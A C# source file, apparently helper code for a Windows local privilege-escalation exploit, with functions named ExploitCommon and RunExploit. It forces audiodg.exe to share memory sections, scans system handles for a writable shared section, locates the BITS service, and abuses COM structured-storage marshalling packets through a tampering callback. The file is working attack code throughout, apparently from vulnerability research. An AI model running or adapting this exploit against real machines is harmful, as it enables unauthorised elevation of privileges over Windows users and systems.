﻿using NtApiDotNet;
using System;
using System.IO;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;

namespace StorageResearch
{
    public static class ExploitCommon
    {
        internal static void Write(this BinaryWriter writer, Guid guid)
        {
            writer.Write(guid.ToByteArray());
        }

        internal static void WriteZString(this BinaryWriter writer, string str)
        {
            writer.Write(Encoding.Unicode.GetBytes(str + "\0"));
        }

        internal static byte[] ReadAll(this BinaryReader reader, int length)
        {
            byte[] ret = reader.ReadBytes(length);
            if (ret.Length != length)
            {
                throw new EndOfStreamException();
            }
            return ret;
        }

        internal static Guid ReadGuid(this BinaryReader reader)
        {
            return new Guid(reader.ReadAll(16));
        }

        internal static char ReadUnicodeChar(this BinaryReader reader)
        {
            return BitConverter.ToChar(reader.ReadAll(2), 0);
        }

        internal static string ReadZString(this BinaryReader reader)
        {
            StringBuilder builder = new StringBuilder();
            char ch = reader.ReadUnicodeChar();
            while (ch != 0)
            {
                builder.Append(ch);
                ch = reader.ReadUnicodeChar();
            }
            return builder.ToString();
        }

        static void ReadObjRef(string[] args)
        {
            if (args.Length < 1)
            {
                throw new ArgumentException("Specify path to objref");
            }

            COMObjRefCustom objref = (COMObjRefCustom)COMObjRef.FromArray(File.ReadAllBytes(args[0]));
            BinaryReader reader = new BinaryReader(new MemoryStream(objref.ObjectData));
            Guid marshal_iid = reader.ReadGuid();
            uint flags = reader.ReadUInt32();
            if ((flags & 0x80000000) != 0 && !Environment.Is64BitProcess)
            {
                throw new ArgumentException("Can only inspect objects of the same bitness");
            }
            Console.WriteLine("IID: {0} Flags: {1:X08}", marshal_iid, flags);
            COMObjRef marshal_obj = COMObjRef.FromReader(reader);
            Console.WriteLine(marshal_obj);
            byte[] data = reader.ReadAll(Marshal.SizeOf<SDfMarshalPacket>());
            var handle = GCHandle.Alloc(data, GCHandleType.Pinned);
            try
            {
                SDfMarshalPacket packet = Marshal.PtrToStructure<SDfMarshalPacket>(handle.AddrOfPinnedObject());
                Console.WriteLine("{0:X}", packet.cntxid);
                using (NtSection section = NtSection.FromHandle(new SafeKernelObjectHandle(packet.hMem, false)))
                {
                    Console.WriteLine("Section Size: {0}", section.Size);
                    using (NtMappedSection map = section.MapReadWrite())
                    {
                        Console.WriteLine("Committed: {0}", NtProcess.Current.QueryMemoryInformation(map.DangerousGetHandle().ToInt64()).RegionSize);
                    }
                }
            }
            finally
            {
                handle.Free();
            }
        }

        static IAudioClient StartAudioClient()
        {
            IMMDeviceEnumerator device_enum = (IMMDeviceEnumerator)new MMDeviceEnumerator();
            IMMDevice device = device_enum.GetDefaultAudioEndpoint(EDataFlow.eRender, ERole.eConsole);
            Guid iid = typeof(IAudioClient).GUID;
            IAudioClient client = (IAudioClient)device.Activate(ref iid, 6, IntPtr.Zero);
            IntPtr pwfx = client.GetMixFormat();
            client.Initialize(AUDCLNT_SHAREMODE.AUDCLNT_SHAREMODE_SHARED, 0, 10000000, 0, pwfx, IntPtr.Zero);
            return client;
        }

        static int GetAudioDGPid()
        {
            foreach (var proc in NtSystemInfo.GetProcessInformation())
            {
                if (proc.ImageName.Equals("audiodg.exe", StringComparison.OrdinalIgnoreCase))
                {
                    return proc.ProcessId;
                }
            }
            throw new ArgumentException("Can't find PID for AUDIODG");
        }

        static int GetBitsPid()
        {
            object obj = Activator.CreateInstance(Type.GetTypeFromCLSID(new Guid("4991d34b-80a1-4291-83b6-3328366b9097")));
            return NtApiDotNet.Win32.ServiceUtils.GetServiceProcessId("BITS");
        }

        static SharedMemory GetSharedMemory()
        {
            IAudioClient client = StartAudioClient();
            Console.WriteLine("Waiting for handles to be updated");
            Thread.Sleep(1000);
            int audiodg_pid = GetAudioDGPid();
            int current_pid = NtProcess.Current.ProcessId;
            int bits_pid = GetBitsPid();
            if (bits_pid == 0)
                throw new ArgumentException("Couldn't get BITS pid");

            var shared_handles = NtSystemInfo.GetHandles(audiodg_pid, false)
                .Concat(NtSystemInfo.GetHandles(current_pid, false))
                .Where(h => h.ObjectType == "Section" && (h.GrantedAccess & 2) == 2)
                .GroupBy(h => h.Object).Where(g => g.Count() == 2).ToArray();

            foreach (var handle in shared_handles)
            {
                var entries = handle.ToArray();
                if (entries[0].ProcessId == entries[1].ProcessId)
                {
                    continue;
                }

                int local_handle = 0;
                int remote_handle = 0;

                if (entries[0].ProcessId == audiodg_pid)
                {
                    remote_handle = entries[0].Handle;
                    local_handle = entries[1].Handle;
                }
                else
                {
                    local_handle = entries[0].Handle;
                    remote_handle = entries[1].Handle;
                }

                Console.WriteLine("AudioDG 0x{0:X} PID 0x{1:X}", remote_handle, audiodg_pid);
                Console.WriteLine("Local 0x{0:X} PID 0x{1:X}", local_handle, current_pid);
                Console.WriteLine("BITS pid: {0}", bits_pid);
                return new SharedMemory(local_handle, audiodg_pid, remote_handle, client, bits_pid, current_pid);
            }
            throw new ArgumentException("Couldn't get shared handle");
        }

        public static void RunExploit(Func<SDfMarshalPacket, SharedMemory, SDfMarshalPacket> callback)
        {
            try
            {
                if (!Environment.Is64BitProcess)
                {
                    throw new ArgumentException("Must run as a 64bit process");
                }

                IStorage stg = ComUtils.CreateStorage("abc.stg");
                TestClass c = new TestClass(stg, GetSharedMemory(), callback);
                ComUtils.BootstrapComMarshal(c);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
